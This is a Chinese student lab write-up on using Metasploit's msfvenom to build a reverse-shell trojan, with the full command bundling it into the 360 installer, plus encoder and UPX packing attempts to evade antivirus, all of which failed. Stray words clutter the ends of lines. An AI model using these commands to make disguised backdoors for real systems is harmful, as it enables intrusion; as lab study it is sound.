(1)Metasploithtml
Metasploit是一款開源的安全漏洞檢測工具,全稱叫作The Metasploit Framework,簡稱MSF。MSF是一個漏洞框架,它容許使用者開發本身的漏洞腳本,從而進行測試。下圖爲Metasploit的體系結構:linux
圖片來源玩轉Metasploit系列(第一集)shell
基礎庫文件:windows
模塊(經過Metasploit框架所裝載、集成並對外提供的最核心的滲透測試功能實現代碼)安全
(2)攻擊載荷工具框架
(1)選擇攻擊載荷tcp
輸入msfconsole
進入metasploit控制檯:工具
輸入show payloads
查看全部能夠使用的攻擊載荷信息:測試
這次實驗咱們使用的是windows/shell_reverse_tcp(一個簡單的反彈shell程序,功能是鏈接靶機的命令行)。編碼
(2)選擇捆綁文件
能夠建立本身的EXE文件,也能夠捆綁到其餘EXE文件。本次實驗選擇捆綁,我找了360的安裝軟件(360.exe)
(3)免殺
製做一個免殺的木馬來繞過殺毒軟件的檢測。在Meatsploit框架下免殺的方式之一是使用MSF編碼器。msfvenom -l encoders
查看編碼方式(並非全部的編碼方式都在windows系統上可用):
本次實驗選擇x86/shikata_ga_nai
:
(4)生成、捆綁、免殺的實現
實驗環境:
攻擊機 Kali linux IP:192.168.177.133
靶機 win7 IP:192.168.177.1
命令解釋:
msfvenom -p windows/shell_reverse_tcp 使用shell_reverse_tcp攻擊載荷 LHOST=192.168.177.133 設置攻擊者IP地址 LPORT=8080 設置攻擊者的監聽端口,用於接收木馬的連接請求 -e x86/shikata_ga_nai 使用shikata_ga_nai的編碼方式 -x 360.exe 將木馬捆綁在360.exe上 -i 5 對目標進行5次編碼 -f exe 指定MSF編碼器輸出格式爲exe -o /root/backdoor.exe 指定處理完畢後的文件輸出路徑
下面進行測試,設置好後等待木馬的連接:
在win7上運行製做好的backdoor.exe,很遺憾被360查殺:
用不一樣的編碼方式多編碼幾回:
運行後仍舊被360查殺:
再嘗試加殼處理,輸入upx參看upx加殼軟件參數。upx -5 backdoor.exe
對backdoor.exe進行加殼(此處爲壓縮處理,加殼的不便之處就是會改變源文件的大小,有經驗的安全人員很容易發現這點差異):
尷尬 ......依然被查殺,能夠看到木馬名稱有變:
因爲是第一次接觸安全系統與軟件,因此本次實驗感謝王政同窗的指導,遇到的問題再仔細琢磨後解決。